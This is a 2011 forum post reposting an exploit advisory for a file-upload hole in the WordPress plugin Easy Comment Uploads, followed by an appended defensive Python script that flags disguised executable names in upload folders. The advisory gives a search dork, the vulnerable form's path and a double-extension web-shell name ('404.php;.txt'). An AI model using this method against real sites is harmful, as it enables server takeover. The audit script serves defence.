Exploit Wordpress "/easy-comment-uploads/upload-form.php" D
satria | Date: Friday, 2011-08-05, 8:50 AM | Message # 1
----------------------------------------------------------------------------
| Title : Wordpress Plugin EasyComment Upload Vulnerability
| Author: Z190T
| Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/
| Email : me@zonedevil.om
| Date : 15/06/2011
| Dork : "/easy-comment-uploads/upload-form.php"
| Category : PHP [File Upload Vulnerability]
| Tested on: [Windows XP3, Linux Ubuntu]
----------------------------------------------------------------------------

*_Exploit_*

# http://[localhost]/[path]/easy-comment-uploads/upload-form.php
# http://[localhost]/easy-comment-uploads/upload-form.php

# File Extension [.txt],[.jpg],[gif],[bmp]

*_Preview_*

# site/wp-content/uploads/[years]/[month]/[yourshell]
# ex: site/wp-content/uploads/2011/06/404.php;.txt

=========================================================

Live Demo :


./Greetz : WanMadehope Cyber4rt
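
A defensive check for the naming pattern in the advisory's example (`404.php;.txt`), as an added example that is not part of the original post: it audits stored upload names for an interpreter extension hidden in front of an allowed final extension. The `EXECUTABLE` set, the function names and the sample paths are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# Extensions the advisory lists as accepted by the upload form.
ALLOWED_FINAL = {"txt", "jpg", "gif", "bmp"}
# Assumption: name segments a misconfigured server might pass to an interpreter.
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar",
              "cgi", "pl", "asp", "aspx", "jsp"}
# Split on '.' and on separators that can hide a second extension.
_SPLIT = re.compile(r"[.;:\x00\s]+")

def classify_upload_name(path):
    """Return 'ok', 'disguised', 'executable' or 'unexpected' for one stored upload."""
    name = PurePosixPath(path).name.lower()
    if not name or name.startswith("."):
        return "unexpected"      # dotfiles such as .htaccess do not belong in uploads
    segments = [s for s in _SPLIT.split(name) if s]
    if len(segments) < 2:
        return "unexpected"      # no extension at all
    *inner, final = segments[1:]
    if final in EXECUTABLE:
        return "executable"
    if any(seg in EXECUTABLE for seg in inner):
        return "disguised"       # e.g. 404.php;.txt from the advisory
    return "ok" if final in ALLOWED_FINAL else "unexpected"

def audit_uploads(paths):
    """Return (path, verdict) for every path that is not 'ok', preserving order."""
    findings = []
    for p in paths:
        verdict = classify_upload_name(p)
        if verdict != "ok":
            findings.append((p, verdict))
    return findings

# Constructed sample listing (not real data); in practice, feed paths
# collected with os.walk() over wp-content/uploads.
SAMPLE_PATHS = [
    "wp-content/uploads/2011/06/holiday.jpg",
    "wp-content/uploads/2011/06/404.php;.txt",
    "wp-content/uploads/2011/06/notes.v2.txt",
    "wp-content/uploads/2011/06/report.PHP.jpg",
    "wp-content/uploads/2011/06/tool.phtml",
]

if __name__ == "__main__":
    for path, verdict in audit_uploads(SAMPLE_PATHS):
        print(f"{verdict:10} {path}")
```

Any `disguised` or `executable` finding under the uploads directory warrants review of the file and of the web server's handler mapping for that directory.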
 